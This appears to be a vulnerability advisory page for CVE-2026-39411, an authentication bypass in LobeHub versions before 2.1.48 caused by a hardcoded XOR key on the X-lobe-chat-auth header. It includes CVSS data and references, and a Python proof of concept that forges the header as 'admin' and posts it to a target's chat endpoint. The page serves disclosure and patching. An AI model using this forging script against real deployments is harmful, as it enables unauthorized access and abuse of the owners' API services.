Security Vulnerability Report
CVE-2026-39411 CVSS 5.0 MEDIUM


Published: 2026-04-08 20:16:26
Last Modified: 2026-04-20 15:03:17

Description

LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, the webapi authentication layer trusts a client-controlled X-lobe-chat-auth header that is only XOR-obfuscated, not signed or otherwise authenticated. Because the XOR key is hardcoded in the repository, an attacker can forge arbitrary auth payloads and bypass authentication on protected webapi routes. Affected routes include /webapi/chat/[provider], /webapi/models/[provider], /webapi/models/[provider]/pull, and /webapi/create-image/comfyui. This vulnerability is fixed in 2.1.48.

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

The score above is the advisory source's (Secondary) assessment. The NVD Primary assessment recorded in the raw JSON data on this page rates the issue 7.1 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N (low attack complexity, high integrity impact), so the severity depends on which source is consulted.

Weaknesses (from the raw JSON data): CWE-287 (Improper Authentication), CWE-290 (Authentication Bypass by Spoofing), CWE-345 (Insufficient Verification of Data Authenticity).

Configurations (Affected Products)

cpe:2.3:a:lobehub:lobehub:*:*:*:*:*:node.js:*:* - VULNERABLE
LobeHub < 2.1.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import base64
import json

# The XOR key is hardcoded in the repository.
# This is a placeholder; the actual key needs to be extracted from the source code.
XOR_KEY = b"YOUR_HARD_CODED_XOR_KEY"


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """XOR encrypt/decrypt data with the given key."""
    return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)])


def forge_auth_header(payload: dict) -> str:
    """Forges the X-lobe-chat-auth header value."""
    payload_str = json.dumps(payload)
    payload_bytes = payload_str.encode('utf-8')
    encrypted_bytes = xor_encrypt(payload_bytes, XOR_KEY)
    return base64.b64encode(encrypted_bytes).decode('utf-8')


# Target endpoint vulnerable to authentication bypass
target_url = "http://<target-host>/webapi/chat/openai"

# Payload to forge (e.g., impersonating an admin or a valid user)
# Adjust the structure based on the actual application logic
malicious_payload = {
    "userId": "admin",
    "apiKey": "fake_api_key"
}

# Generate the forged token
forged_token = forge_auth_header(malicious_payload)

headers = {
    "X-lobe-chat-auth": forged_token,
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, headers=headers)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    if response.status_code == 200:
        print("[+] Authentication bypass successful!")
    else:
        print("[-] Request failed, check parameters.")
except Exception as e:
    print(f"Error: {e}")
```

References

https://github.com/lobehub/lobehub/commit/3327b293d66c013f076cbc16cdbd05a61a3d0428 - Patch
https://github.com/lobehub/lobehub/pull/13535 - Issue Tracking
https://github.com/lobehub/lobehub/releases/tag/v2.1.48 - Product
https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97 - Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39411", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:25.560", "lastModified": "2026-04-20T15:03:17.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, the webapi authentication layer trusts a client-controlled X-lobe-chat-auth header that is only XOR-obfuscated, not signed or otherwise authenticated. Because the XOR key is hardcoded in the repository, an attacker can forge arbitrary auth payloads and bypass authentication on protected webapi routes. Affected routes include /webapi/chat/[provider], /webapi/models/[provider], /webapi/models/[provider]/pull, and /webapi/create-image/comfyui. This vulnerability is fixed in 2.1.48."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": 
"CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lobehub:lobehub:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.1.48", "matchCriteriaId": "1D7F83BA-FA07-4B09-BC8E-9F9B4609E770"}]}]}], "references": [{"url": "https://github.com/lobehub/lobehub/commit/3327b293d66c013f076cbc16cdbd05a61a3d0428", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/lobehub/lobehub/pull/13535", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/lobehub/lobehub/releases/tag/v2.1.48", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}